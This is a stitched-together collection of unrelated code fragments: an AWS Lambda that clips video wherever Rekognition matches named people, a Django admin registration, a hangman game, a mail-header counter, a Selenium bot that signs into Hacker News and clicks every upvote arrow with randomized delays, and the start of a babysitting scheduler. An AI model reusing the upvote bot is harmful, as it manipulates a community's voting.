1000 * FRAME_RATE) < 10:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000\n ).strftime('%H:%M:%S') + ':0' + str(int(collection[-1] %\n 1000 / 1000 * FRAME_RATE))\n else:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000\n ).strftime('%H:%M:%S') + ':' + str(int(collection[-1] %\n 1000 / 1000 * FRAME_RATE))\n scenesTime.append((start, end))\n else:\n pass\n JOB_BUCKET = templatePath.split('/')[2]\n JOB_OBJECT = '/'.join(templatePath.split('/')[3:])\n s3_client.download_file(JOB_BUCKET, JOB_OBJECT, '/tmp/job-template.json')\n finalName = []\n for people in PEOPLE:\n finalName.append(people.strip())\n OUTPUT_NAME = '-' + '-'.join(finalName)\n with open('/tmp/job-template.json', 'r') as r:\n template = json.load(r)\n for scene in scenesTime:\n template['Settings']['Inputs'][0]['InputClippings'].append({\n 'StartTimecode': scene[0], 'EndTimecode': scene[-1]})\n template['Settings']['Inputs'][0]['FileInput'] = videoPath\n template['Settings']['OutputGroups'][0]['Outputs'][0]['NameModifier'\n ] = OUTPUT_NAME\n template['Settings']['OutputGroups'][0]['OutputGroupSettings'][\n 'FileGroupSettings']['Destination'] = BUCKET_PATH\n with open('/tmp/job-all.json', 'w') as w:\n json.dump(template, w, indent=2)\n w.close()\n r.close()\n mediaconvert_client = boto3.client('mediaconvert', region_name=regionName)\n response = 
mediaconvert_client.describe_endpoints(Mode='DEFAULT')\n mediaURL = response['Endpoints'][0]['Url']\n mediaconvert_client = boto3.client('mediaconvert', endpoint_url=mediaURL)\n with open('/tmp/job-all.json', 'r') as jsonfile:\n job_object = json.load(jsonfile)\n mediaconvert_client.create_job(**job_object)\n output = {'videoPath': videoPath, 'templatePath': templatePath,\n 'facePath': facePath, 'targetPerson': targetPeople, 'Frame Rate':\n FRAME_RATE}\n return {'statusCode': 200, 'body': json.dumps(output)}\n",
"step-4": "import json\nimport boto3\nimport os\nimport datetime\nregionName = os.environ['AWS_REGION']\nBUCKET_PATH = os.environ['BUCKET_PATH']\nSENSITIVIT = os.environ['SENSITIVIT']\ns3_client = boto3.client('s3', region_name=regionName)\nddb_resource = boto3.resource('dynamodb', region_name=regionName)\n\n\ndef lambda_handler(event, context):\n body = event\n videoPath = str(body['videoPath'])\n templatePath = str(body['templatePath'])\n facePath = str(body['facePath'])\n targetPeople = str(body['targetPeople'])\n FACES_BUCKET = facePath.split('/')[2]\n FACES_OBJECT = '/'.join(facePath.split('/')[3:])\n s3_client.download_file(FACES_BUCKET, FACES_OBJECT, '/tmp/faces.json')\n facesJson = open('/tmp/faces.json', 'r')\n facesData = json.load(facesJson)\n FRAME_RATE = int(facesData['VideoMetadata']['FrameRate'])\n PEOPLE = targetPeople.split(',')\n timeStamps = []\n scenesTime = []\n i = 0\n while i < len(facesData['Persons']):\n try:\n for target in PEOPLE:\n if facesData['Persons'][i]['FaceMatches'] == []:\n pass\n elif facesData['Persons'][i]['FaceMatches'][0]['Face'][\n 'ExternalImageId'] == target.strip():\n timeStamps.append(facesData['Persons'][i]['Timestamp'])\n except IndexError:\n pass\n i = i + 1\n timeCollection = [[timeStamps[0]]]\n i = 1\n j = 0\n while i < len(timeStamps):\n if timeStamps[i] - timeCollection[j][-1] <= 1000:\n timeCollection[j].append(timeStamps[i])\n i = i + 1\n else:\n j = j + 1\n timeCollection.append([timeStamps[i]])\n for collection in timeCollection:\n if collection[-1] - collection[0] >= 1000:\n if collection[0] % 1000 == 0:\n start = datetime.datetime.utcfromtimestamp(collection[0] //\n 1000).strftime('%H:%M:%S') + ':00'\n elif int(collection[0] % 1000 / 1000 * FRAME_RATE) < 10:\n start = datetime.datetime.utcfromtimestamp(collection[0] //\n 1000).strftime('%H:%M:%S') + ':0' + str(int(collection[\n 0] % 1000 / 1000 * FRAME_RATE))\n else:\n start = datetime.datetime.utcfromtimestamp(collection[0] //\n 1000).strftime('%H:%M:%S') + ':' + str(int(collection[0\n ] % 1000 / 1000 * FRAME_RATE))\n if collection[-1] % 1000 == 0:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000\n ).strftime('%H:%M:%S') + ':00'\n elif int(collection[-1] % 1000 / 1000 * FRAME_RATE) < 10:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000\n ).strftime('%H:%M:%S') + ':0' + str(int(collection[-1] %\n 1000 / 1000 * FRAME_RATE))\n else:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000\n ).strftime('%H:%M:%S') + ':' + str(int(collection[-1] %\n 1000 / 1000 * FRAME_RATE))\n scenesTime.append((start, end))\n else:\n pass\n JOB_BUCKET = templatePath.split('/')[2]\n JOB_OBJECT = '/'.join(templatePath.split('/')[3:])\n s3_client.download_file(JOB_BUCKET, JOB_OBJECT, '/tmp/job-template.json')\n finalName = []\n for people in PEOPLE:\n finalName.append(people.strip())\n OUTPUT_NAME = '-' + '-'.join(finalName)\n with open('/tmp/job-template.json', 'r') as r:\n template = json.load(r)\n for scene in scenesTime:\n template['Settings']['Inputs'][0]['InputClippings'].append({\n 'StartTimecode': scene[0], 'EndTimecode': scene[-1]})\n template['Settings']['Inputs'][0]['FileInput'] = videoPath\n template['Settings']['OutputGroups'][0]['Outputs'][0]['NameModifier'\n ] = OUTPUT_NAME\n template['Settings']['OutputGroups'][0]['OutputGroupSettings'][\n 'FileGroupSettings']['Destination'] = BUCKET_PATH\n with open('/tmp/job-all.json', 'w') as w:\n json.dump(template, w, indent=2)\n w.close()\n r.close()\n mediaconvert_client = boto3.client('mediaconvert', 
region_name=regionName)\n response = mediaconvert_client.describe_endpoints(Mode='DEFAULT')\n mediaURL = response['Endpoints'][0]['Url']\n mediaconvert_client = boto3.client('mediaconvert', endpoint_url=mediaURL)\n with open('/tmp/job-all.json', 'r') as jsonfile:\n job_object = json.load(jsonfile)\n mediaconvert_client.create_job(**job_object)\n output = {'videoPath': videoPath, 'templatePath': templatePath,\n 'facePath': facePath, 'targetPerson': targetPeople, 'Frame Rate':\n FRAME_RATE}\n return {'statusCode': 200, 'body': json.dumps(output)}\n",
"step-5": "import json\nimport boto3\nimport os\nimport datetime\n\n\nregionName = os.environ['AWS_REGION']\nBUCKET_PATH = os.environ['BUCKET_PATH']\nSENSITIVIT = os.environ['SENSITIVIT']\n\ns3_client = boto3.client('s3', region_name=regionName)\nddb_resource = boto3.resource('dynamodb', region_name=regionName)\n\ndef lambda_handler(event, context):\n# body = json.loads(event['body'])\n body = event\n videoPath = str(body['videoPath'])\n templatePath = str(body['templatePath'])\n facePath = str(body['facePath'])\n targetPeople = str(body['targetPeople'])\n \n FACES_BUCKET = facePath.split('/')[2]\n FACES_OBJECT = '/'.join(facePath.split('/')[3:])\n \n s3_client.download_file(FACES_BUCKET, FACES_OBJECT, '/tmp/faces.json')\n facesJson = open('/tmp/faces.json', 'r')\n facesData = json.load(facesJson)\n \n FRAME_RATE = int(facesData['VideoMetadata']['FrameRate'])\n \n PEOPLE = targetPeople.split(',')\n \n timeStamps = []\n scenesTime = []\n \n i = 0\n while i < len(facesData['Persons']):\n try:\n for target in PEOPLE:\n if facesData['Persons'][i]['FaceMatches'] == []:\n pass\n elif facesData['Persons'][i]['FaceMatches'][0]['Face']['ExternalImageId'] == target.strip():\n timeStamps.append(facesData['Persons'][i]['Timestamp'])\n except IndexError:\n pass\n i = i+1\n \n timeCollection = [[timeStamps[0]]]\n i = 1\n j = 0\n while i < len(timeStamps):\n if timeStamps[i] - timeCollection[j][-1] <= 1000:\n timeCollection[j].append(timeStamps[i])\n i = i+1\n else:\n j = j+1\n timeCollection.append([timeStamps[i]])\n \n for collection in timeCollection:\n if collection[-1] - collection[0] >= 1000:\n if collection[0] % 1000 == 0:\n start = datetime.datetime.utcfromtimestamp(collection[0]//1000).strftime(\"%H:%M:%S\") + ':00'\n elif int(collection[0] % 1000 / 1000 * FRAME_RATE) < 10:\n start = datetime.datetime.utcfromtimestamp(collection[0] // 1000).strftime(\"%H:%M:%S\") + ':0' + str(int(collection[0] % 1000 / 1000 * FRAME_RATE))\n else:\n start = datetime.datetime.utcfromtimestamp(collection[0]//1000).strftime(\"%H:%M:%S\") + ':' + str(int(collection[0] % 1000 / 1000 * FRAME_RATE))\n if collection[-1] % 1000 == 0:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000).strftime(\"%H:%M:%S\") + ':00'\n elif int(collection[-1] % 1000 / 1000 * FRAME_RATE) < 10:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000).strftime(\"%H:%M:%S\") + ':0' + str(int(collection[-1] % 1000 / 1000 * FRAME_RATE))\n else:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000).strftime(\"%H:%M:%S\") + ':' + str(int(collection[-1] % 1000 / 1000 * FRAME_RATE))\n scenesTime.append((start,end))\n else:\n pass\n \n JOB_BUCKET = templatePath.split('/')[2]\n JOB_OBJECT = '/'.join(templatePath.split('/')[3:])\n s3_client.download_file(JOB_BUCKET, JOB_OBJECT, '/tmp/job-template.json')\n \n finalName = []\n for people in PEOPLE:\n finalName.append(people.strip())\n \n OUTPUT_NAME = '-'+'-'.join(finalName)\n \n with open('/tmp/job-template.json', 'r') as r:\n template = json.load(r)\n for scene in scenesTime:\n template['Settings']['Inputs'][0]['InputClippings'].append({'StartTimecode': scene[0], 'EndTimecode': scene[-1]})\n template['Settings']['Inputs'][0]['FileInput'] = videoPath\n template['Settings']['OutputGroups'][0]['Outputs'][0]['NameModifier'] = OUTPUT_NAME\n template['Settings']['OutputGroups'][0]['OutputGroupSettings']['FileGroupSettings']['Destination'] = BUCKET_PATH\n with open('/tmp/job-all.json', 'w') as w:\n json.dump(template, w, indent=2)\n w.close()\n r.close()\n \n 
mediaconvert_client = boto3.client('mediaconvert', region_name=regionName)\n\n response = mediaconvert_client.describe_endpoints(Mode='DEFAULT')\n \n mediaURL = response['Endpoints'][0]['Url']\n \n mediaconvert_client = boto3.client('mediaconvert',endpoint_url=mediaURL)\n \n with open(\"/tmp/job-all.json\", \"r\") as jsonfile:\n job_object = json.load(jsonfile)\n \n mediaconvert_client.create_job(**job_object)\n \n \n output = {'videoPath': videoPath,\n 'templatePath': templatePath,\n 'facePath': facePath,\n 'targetPerson': targetPeople,\n 'Frame Rate': FRAME_RATE\n }\n return {\n 'statusCode': 200,\n 'body': json.dumps(output)\n }\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django.contrib import admin
# Register your models here.
from .models import HuyenQuan
admin.site.register(HuyenQuan)
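# Illustrative alternative, not part of the original snippet: Django's
# admin.register decorator performs the same registration and is convenient
# when a custom ModelAdmin is added later.
#
# @admin.register(HuyenQuan)
# class HuyenQuanAdmin(admin.ModelAdmin):
#     pass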
|
normal
|
{
"blob_id": "16e5a44cb4fbe71eaa9c1f5b00505578de0d2cea",
"index": 6403,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nadmin.site.register(HuyenQuan)\n",
"step-3": "from django.contrib import admin\nfrom .models import HuyenQuan\nadmin.site.register(HuyenQuan)\n",
"step-4": "from django.contrib import admin\n\n# Register your models here.\nfrom .models import HuyenQuan\n\nadmin.site.register(HuyenQuan)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*- coding: utf-8 -*-
import random
IMAGES = ['''
+---+
| |
|
|
|
|
=========''', '''
+---+
| |
O |
|
|
|
=========''', '''
+---+
| |
O |
| |
|
|
=========''', '''
+---+
| |
O |
/| |
|
|
=========''', '''
+---+
| |
O |
/|\ |
|
|
=========''', '''
+---+
| |
O |
/|\ |
| |
|
=========''', '''
+---+
| |
O |
/|\ |
| |
/ |
=========''', '''
+---+
| |
O |
/|\ |
| |
/ \ |
=========''', '''
''']
WORDS = [
'lavadora',
'secadora',
'sofa',
'gobierno',
'diputado',
'democracia',
'computadora',
'teclado'
]
# Function that returns a random word
def randomWord():
id = random.randint(0, len(WORDS) - 1)
return WORDS[id]
def displayBoard(hiddenWord, tries):
print(IMAGES[tries] + '\n')
print(hiddenWord)
print('--- * --- * --- * --- * --- * ---')
def run():
word = randomWord()
hiddenWord = ['-'] * len(word)
tries = 0
while True:
displayBoard(hiddenWord, tries)
currentLetter = str(raw_input('Escoge una letra: '))
letterIndexes = []
for i in range(len(word)):
if word[i] == currentLetter:
letterIndexes.append(i)
if len(letterIndexes) == 0:
tries += 1
            # Check whether the player has lost
if tries == len(IMAGES) - 2:
displayBoard(hiddenWord, tries)
print('\nLo sentimos, perdiste. La palabra correcta era {}'.format(word))
break
else:
for id in letterIndexes:
hiddenWord[id] = currentLetter
letterIndexes = []
            # Check whether the player has won
try:
hiddenWord.index('-')
except ValueError:
print('\nFelicidades. Ganaste. La palabra es: {}'.format(word))
break
if __name__ == '__main__':
print('B I E N V E N I D O S A A H O R C A D O S')
run()
|
normal
|
{
"blob_id": "074defa92c8bc5afc221c9c19842d808fbf1e112",
"index": 197,
"step-1": "<mask token>\n\n\ndef run():\n word = randomWord()\n hiddenWord = ['-'] * len(word)\n tries = 0\n while True:\n displayBoard(hiddenWord, tries)\n currentLetter = str(raw_input('Escoge una letra: '))\n letterIndexes = []\n for i in range(len(word)):\n if word[i] == currentLetter:\n letterIndexes.append(i)\n if len(letterIndexes) == 0:\n tries += 1\n if tries == len(IMAGES) - 2:\n displayBoard(hiddenWord, tries)\n print('\\nLo sentimos, perdiste. La palabra correcta era {}'\n .format(word))\n break\n else:\n for id in letterIndexes:\n hiddenWord[id] = currentLetter\n letterIndexes = []\n try:\n hiddenWord.index('-')\n except ValueError:\n print('\\nFelicidades. Ganaste. La palabra es: {}'.format(word))\n break\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef randomWord():\n id = random.randint(0, len(WORDS) - 1)\n return WORDS[id]\n\n\ndef displayBoard(hiddenWord, tries):\n print(IMAGES[tries] + '\\n')\n print(hiddenWord)\n print('--- * --- * --- * --- * --- * ---')\n\n\ndef run():\n word = randomWord()\n hiddenWord = ['-'] * len(word)\n tries = 0\n while True:\n displayBoard(hiddenWord, tries)\n currentLetter = str(raw_input('Escoge una letra: '))\n letterIndexes = []\n for i in range(len(word)):\n if word[i] == currentLetter:\n letterIndexes.append(i)\n if len(letterIndexes) == 0:\n tries += 1\n if tries == len(IMAGES) - 2:\n displayBoard(hiddenWord, tries)\n print('\\nLo sentimos, perdiste. La palabra correcta era {}'\n .format(word))\n break\n else:\n for id in letterIndexes:\n hiddenWord[id] = currentLetter\n letterIndexes = []\n try:\n hiddenWord.index('-')\n except ValueError:\n print('\\nFelicidades. Ganaste. La palabra es: {}'.format(word))\n break\n\n\nif __name__ == '__main__':\n print('B I E N V E N I D O S A A H O R C A D O S')\n run()\n",
"step-3": "<mask token>\nIMAGES = [\n \"\"\"\n\n +---+\n | |\n |\n |\n |\n |\n =========\"\"\"\n ,\n \"\"\"\n\n +---+\n | |\n O |\n |\n |\n |\n =========\"\"\"\n ,\n \"\"\"\n\n +---+\n | |\n O |\n | |\n |\n |\n =========\"\"\"\n ,\n \"\"\"\n \n +---+\n | |\n O |\n /| |\n |\n |\n =========\"\"\"\n ,\n \"\"\"\n \n +---+\n | |\n O |\n /|\\\\ |\n |\n |\n =========\"\"\"\n ,\n \"\"\"\n \n +---+\n | |\n O |\n /|\\\\ |\n | |\n |\n =========\"\"\"\n ,\n \"\"\"\n \n +---+\n | |\n O |\n /|\\\\ |\n | |\n / |\n =========\"\"\"\n ,\n \"\"\"\n \n +---+\n | |\n O |\n /|\\\\ |\n | |\n / \\\\ |\n =========\"\"\"\n , '\\n']\nWORDS = ['lavadora', 'secadora', 'sofa', 'gobierno', 'diputado',\n 'democracia', 'computadora', 'teclado']\n\n\ndef randomWord():\n id = random.randint(0, len(WORDS) - 1)\n return WORDS[id]\n\n\ndef displayBoard(hiddenWord, tries):\n print(IMAGES[tries] + '\\n')\n print(hiddenWord)\n print('--- * --- * --- * --- * --- * ---')\n\n\ndef run():\n word = randomWord()\n hiddenWord = ['-'] * len(word)\n tries = 0\n while True:\n displayBoard(hiddenWord, tries)\n currentLetter = str(raw_input('Escoge una letra: '))\n letterIndexes = []\n for i in range(len(word)):\n if word[i] == currentLetter:\n letterIndexes.append(i)\n if len(letterIndexes) == 0:\n tries += 1\n if tries == len(IMAGES) - 2:\n displayBoard(hiddenWord, tries)\n print('\\nLo sentimos, perdiste. La palabra correcta era {}'\n .format(word))\n break\n else:\n for id in letterIndexes:\n hiddenWord[id] = currentLetter\n letterIndexes = []\n try:\n hiddenWord.index('-')\n except ValueError:\n print('\\nFelicidades. Ganaste. La palabra es: {}'.format(word))\n break\n\n\nif __name__ == '__main__':\n print('B I E N V E N I D O S A A H O R C A D O S')\n run()\n",
"step-4": "import random\nIMAGES = [\n \"\"\"\n\n +---+\n | |\n |\n |\n |\n |\n =========\"\"\"\n ,\n \"\"\"\n\n +---+\n | |\n O |\n |\n |\n |\n =========\"\"\"\n ,\n \"\"\"\n\n +---+\n | |\n O |\n | |\n |\n |\n =========\"\"\"\n ,\n \"\"\"\n \n +---+\n | |\n O |\n /| |\n |\n |\n =========\"\"\"\n ,\n \"\"\"\n \n +---+\n | |\n O |\n /|\\\\ |\n |\n |\n =========\"\"\"\n ,\n \"\"\"\n \n +---+\n | |\n O |\n /|\\\\ |\n | |\n |\n =========\"\"\"\n ,\n \"\"\"\n \n +---+\n | |\n O |\n /|\\\\ |\n | |\n / |\n =========\"\"\"\n ,\n \"\"\"\n \n +---+\n | |\n O |\n /|\\\\ |\n | |\n / \\\\ |\n =========\"\"\"\n , '\\n']\nWORDS = ['lavadora', 'secadora', 'sofa', 'gobierno', 'diputado',\n 'democracia', 'computadora', 'teclado']\n\n\ndef randomWord():\n id = random.randint(0, len(WORDS) - 1)\n return WORDS[id]\n\n\ndef displayBoard(hiddenWord, tries):\n print(IMAGES[tries] + '\\n')\n print(hiddenWord)\n print('--- * --- * --- * --- * --- * ---')\n\n\ndef run():\n word = randomWord()\n hiddenWord = ['-'] * len(word)\n tries = 0\n while True:\n displayBoard(hiddenWord, tries)\n currentLetter = str(raw_input('Escoge una letra: '))\n letterIndexes = []\n for i in range(len(word)):\n if word[i] == currentLetter:\n letterIndexes.append(i)\n if len(letterIndexes) == 0:\n tries += 1\n if tries == len(IMAGES) - 2:\n displayBoard(hiddenWord, tries)\n print('\\nLo sentimos, perdiste. La palabra correcta era {}'\n .format(word))\n break\n else:\n for id in letterIndexes:\n hiddenWord[id] = currentLetter\n letterIndexes = []\n try:\n hiddenWord.index('-')\n except ValueError:\n print('\\nFelicidades. Ganaste. La palabra es: {}'.format(word))\n break\n\n\nif __name__ == '__main__':\n print('B I E N V E N I D O S A A H O R C A D O S')\n run()\n",
"step-5": "# -*- coding: utf-8 -*-\n\nimport random\n\nIMAGES = ['''\n\n +---+\n | |\n |\n |\n |\n |\n =========''', '''\n\n +---+\n | |\n O |\n |\n |\n |\n =========''', '''\n\n +---+\n | |\n O |\n | |\n |\n |\n =========''', '''\n \n +---+\n | |\n O |\n /| |\n |\n |\n =========''', '''\n \n +---+\n | |\n O |\n /|\\ |\n |\n |\n =========''', '''\n \n +---+\n | |\n O |\n /|\\ |\n | |\n |\n =========''', '''\n \n +---+\n | |\n O |\n /|\\ |\n | |\n / |\n =========''', '''\n \n +---+\n | |\n O |\n /|\\ |\n | |\n / \\ |\n =========''', '''\n''']\n\nWORDS = [\n 'lavadora',\n 'secadora',\n 'sofa',\n 'gobierno',\n 'diputado',\n 'democracia',\n 'computadora',\n 'teclado'\n]\n\n# Funcion que regresa una palabra aleatoria\ndef randomWord():\n id = random.randint(0, len(WORDS) - 1)\n return WORDS[id]\n\ndef displayBoard(hiddenWord, tries):\n print(IMAGES[tries] + '\\n')\n print(hiddenWord)\n print('--- * --- * --- * --- * --- * ---')\n\ndef run():\n word = randomWord()\n hiddenWord = ['-'] * len(word)\n tries = 0\n\n while True:\n displayBoard(hiddenWord, tries)\n currentLetter = str(raw_input('Escoge una letra: '))\n\n letterIndexes = []\n for i in range(len(word)):\n if word[i] == currentLetter:\n letterIndexes.append(i)\n\n if len(letterIndexes) == 0:\n tries += 1\n\n # Checa si perdio el jugador\n if tries == len(IMAGES) - 2:\n displayBoard(hiddenWord, tries)\n print('\\nLo sentimos, perdiste. La palabra correcta era {}'.format(word))\n break\n else:\n for id in letterIndexes:\n hiddenWord[id] = currentLetter\n\n letterIndexes = []\n\n # Chea si gano el jugador\n try:\n hiddenWord.index('-')\n except ValueError:\n print('\\nFelicidades. Ganaste. La palabra es: {}'.format(word))\n break\n\nif __name__ == '__main__':\n print('B I E N V E N I D O S A A H O R C A D O S')\n run()",
"step-ids": [
1,
4,
5,
6,
7
]
}
|
[
1,
4,
5,
6,
7
] |
"""
exercise 9-7-9-2: count how many messages arrived on each weekday by reading
the 'From ' header lines of a mailbox file.
"""
fname = raw_input("Enter file name: ")
filehandle = open(fname)
d = dict()
for line in filehandle:
newline = line.split()
if newline != [] and newline[0] == 'From':
day = newline[2]
if day not in d:
d[day] = 1
else:
d[day] += 1
print d
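# Illustrative run (assuming a py4e-style mailbox file, where a 'From ' line
# looks like "From [email protected] Sat Jan  5 09:14:16 2008" and the
# third token is the weekday): the script would print something like
# {'Sat': 1, 'Fri': 20, 'Thu': 6}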
|
normal
|
{
"blob_id": "7beb9d9e24f4c9a4e1a486048371da79c35d0927",
"index": 8527,
"step-1": "\"\"\"\r\nexercise 9-7-9-2\r\n\r\n\"\"\"\r\n\r\nfname = raw_input(\"Enter file name: \")\r\nfilehandle = open(fname)\r\nd = dict()\r\nfor line in filehandle:\r\n newline = line.split()\r\n if newline != [] and newline[0] == 'From':\r\n day = newline[2]\r\n if day not in d:\r\n d[day] = 1\r\n else:\r\n d[day] += 1\r\nprint d \r\n ",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
import random
PATH = "C:\\Program Files (x86)\\chromedriver.exe"
destination = "https://news.ycombinator.com/"
class hackernewsUpvoter():
def __init__(self, username, password, website):
self.driver = webdriver.Chrome(PATH)
self.username = username
self.password = password
self.website = website
def sign_in(self, login_page="https://news.ycombinator.com/login"):
        # Go to the Hacker News login page
self.driver.get(login_page)
time.sleep(2)
# Enter username
account = self.driver.find_element_by_name('acct')
account.send_keys(self.username)
# Enter password
password = self.driver.find_element_by_name('pw')
password.send_keys(self.password)
time.sleep(random.randrange(11,35)/10)
# Click enter key
password.send_keys(Keys.RETURN)
def upvoter(self):
upvoteButtons = self.driver.find_elements_by_class_name("votearrow")
        # Click every upvote button on the page
for button in upvoteButtons:
try:
button.click()
time.sleep(1)
except:
print("The upvote button wasn't clickable")
pass
def goto_page(self, page):
self.driver.get("https://news.ycombinator.com/news?p={}".format(page))
def next_page(self):
more = self.driver.find_elements_by_class_name("morelink")
more[0].click()
bot = hackernewsUpvoter(input(), input(), destination)
bot.sign_in()
for i in range(3,5):
bot.upvoter()
bot.goto_page(i)
time.sleep(random.randrange(300,500)/100)
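# Sketch, not part of the original script: the fixed sleeps could be replaced
# by Selenium's explicit waits; the 10-second timeout below is an arbitrary
# choice made for illustration.
# from selenium.webdriver.support.ui import WebDriverWait
# from selenium.webdriver.support import expected_conditions as EC
# from selenium.webdriver.common.by import By
# WebDriverWait(bot.driver, 10).until(
#     EC.presence_of_all_elements_located((By.CLASS_NAME, "votearrow")))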
|
normal
|
{
"blob_id": "742b655ee6aad2575f67e7329ed7a14c4fb6aa06",
"index": 7242,
"step-1": "<mask token>\n\n\nclass hackernewsUpvoter:\n <mask token>\n\n def sign_in(self, login_page='https://news.ycombinator.com/login'):\n self.driver.get(login_page)\n time.sleep(2)\n account = self.driver.find_element_by_name('acct')\n account.send_keys(self.username)\n password = self.driver.find_element_by_name('pw')\n password.send_keys(self.password)\n time.sleep(random.randrange(11, 35) / 10)\n password.send_keys(Keys.RETURN)\n <mask token>\n\n def goto_page(self, page):\n self.driver.get('https://news.ycombinator.com/news?p={}'.format(page))\n\n def next_page(self):\n more = self.driver.find_elements_by_class_name('morelink')\n more[0].click()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass hackernewsUpvoter:\n\n def __init__(self, username, password, website):\n self.driver = webdriver.Chrome(PATH)\n self.username = username\n self.password = password\n self.website = website\n\n def sign_in(self, login_page='https://news.ycombinator.com/login'):\n self.driver.get(login_page)\n time.sleep(2)\n account = self.driver.find_element_by_name('acct')\n account.send_keys(self.username)\n password = self.driver.find_element_by_name('pw')\n password.send_keys(self.password)\n time.sleep(random.randrange(11, 35) / 10)\n password.send_keys(Keys.RETURN)\n <mask token>\n\n def goto_page(self, page):\n self.driver.get('https://news.ycombinator.com/news?p={}'.format(page))\n\n def next_page(self):\n more = self.driver.find_elements_by_class_name('morelink')\n more[0].click()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass hackernewsUpvoter:\n\n def __init__(self, username, password, website):\n self.driver = webdriver.Chrome(PATH)\n self.username = username\n self.password = password\n self.website = website\n\n def sign_in(self, login_page='https://news.ycombinator.com/login'):\n self.driver.get(login_page)\n time.sleep(2)\n account = self.driver.find_element_by_name('acct')\n account.send_keys(self.username)\n password = self.driver.find_element_by_name('pw')\n password.send_keys(self.password)\n time.sleep(random.randrange(11, 35) / 10)\n password.send_keys(Keys.RETURN)\n\n def upvoter(self):\n upvoteButtons = self.driver.find_elements_by_class_name('votearrow')\n for button in upvoteButtons:\n try:\n button.click()\n time.sleep(1)\n except:\n print(\"The upvote button wasn't clickable\")\n pass\n\n def goto_page(self, page):\n self.driver.get('https://news.ycombinator.com/news?p={}'.format(page))\n\n def next_page(self):\n more = self.driver.find_elements_by_class_name('morelink')\n more[0].click()\n\n\n<mask token>\nbot.sign_in()\nfor i in range(3, 5):\n bot.upvoter()\n bot.goto_page(i)\n time.sleep(random.randrange(300, 500) / 100)\n",
"step-4": "<mask token>\nPATH = 'C:\\\\Program Files (x86)\\\\chromedriver.exe'\ndestination = 'https://news.ycombinator.com/'\n\n\nclass hackernewsUpvoter:\n\n def __init__(self, username, password, website):\n self.driver = webdriver.Chrome(PATH)\n self.username = username\n self.password = password\n self.website = website\n\n def sign_in(self, login_page='https://news.ycombinator.com/login'):\n self.driver.get(login_page)\n time.sleep(2)\n account = self.driver.find_element_by_name('acct')\n account.send_keys(self.username)\n password = self.driver.find_element_by_name('pw')\n password.send_keys(self.password)\n time.sleep(random.randrange(11, 35) / 10)\n password.send_keys(Keys.RETURN)\n\n def upvoter(self):\n upvoteButtons = self.driver.find_elements_by_class_name('votearrow')\n for button in upvoteButtons:\n try:\n button.click()\n time.sleep(1)\n except:\n print(\"The upvote button wasn't clickable\")\n pass\n\n def goto_page(self, page):\n self.driver.get('https://news.ycombinator.com/news?p={}'.format(page))\n\n def next_page(self):\n more = self.driver.find_elements_by_class_name('morelink')\n more[0].click()\n\n\nbot = hackernewsUpvoter(input(), input(), destination)\nbot.sign_in()\nfor i in range(3, 5):\n bot.upvoter()\n bot.goto_page(i)\n time.sleep(random.randrange(300, 500) / 100)\n",
"step-5": "from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\nimport random\n\nPATH = \"C:\\\\Program Files (x86)\\\\chromedriver.exe\"\ndestination = \"https://news.ycombinator.com/\"\n\nclass hackernewsUpvoter():\n def __init__(self, username, password, website):\n self.driver = webdriver.Chrome(PATH) \n self.username = username\n self.password = password\n self.website = website\n\n def sign_in(self, login_page=\"https://news.ycombinator.com/login\"):\n # Go to hackernews's website\n self.driver.get(login_page)\n time.sleep(2)\n\n # Enter username \n account = self.driver.find_element_by_name('acct')\n account.send_keys(self.username)\n\n # Enter password\n password = self.driver.find_element_by_name('pw')\n password.send_keys(self.password)\n time.sleep(random.randrange(11,35)/10)\n\n # Click enter key\n password.send_keys(Keys.RETURN)\n \n def upvoter(self):\n upvoteButtons = self.driver.find_elements_by_class_name(\"votearrow\")\n\n # Click every upvote buttons in the page \n for button in upvoteButtons:\n try: \n button.click()\n time.sleep(1)\n except: \n print(\"The upvote button wasn't clickable\")\n pass\n \n def goto_page(self, page):\n self.driver.get(\"https://news.ycombinator.com/news?p={}\".format(page))\n\n def next_page(self):\n more = self.driver.find_elements_by_class_name(\"morelink\")\n more[0].click()\n\nbot = hackernewsUpvoter(input(), input(), destination)\nbot.sign_in()\n\nfor i in range(3,5):\n bot.upvoter() \n bot.goto_page(i)\n time.sleep(random.randrange(300,500)/100)\n\n\n\n",
"step-ids": [
4,
5,
7,
8,
10
]
}
|
[
4,
5,
7,
8,
10
] |
"""
file: babysit.py
language: python3
author: [email protected] Parvathi Nair
author: vpb8262 Vishal Bulchandani
"""
"""
Compute the maximum pay a brother and sister can earn from babysitting jobs.
Jobs with four or more children require both siblings, while smaller jobs can
be handled by one of them alone, so jobs may be worked together or separately.
"""
from operator import *
class Job:
"""
Job class which stores the attributes of the jobs
"""
def __init__(self, day, startTime, endTime, noOfChildren, hourlyRate):
self.day=day
self.startTime=startTime
self.endTime=endTime
self.noOfChildren=noOfChildren
self.hourlyRate=hourlyRate
self.value=(endTime-startTime)/100*hourlyRate
def __str__(self):
return str(self.day)+ " " + str(self.startTime) + " "+ str(self.endTime) + " " +str(self.noOfChildren) + " " + str(self.hourlyRate)+ " " + str(self.value)
# total is a global variable that accumulates the maximum pay over all days
total = 0
def takeInput():
"""
Takes input from the console and creates objects and stores in a list jobList
:return: jobList-list in which input is stored as objects
"""
n=int(input())
jobList=[]
#taking n inputs and creating objects
for i in range (n):
str = input().strip('\n').split(" ")
if int(str[1])>=600 and int(str[2])<=2300:
jobs=Job (int(str[0]),int(str[1]),int(str[2]),int(str[3]),int(str[4]))
jobList.append(jobs)
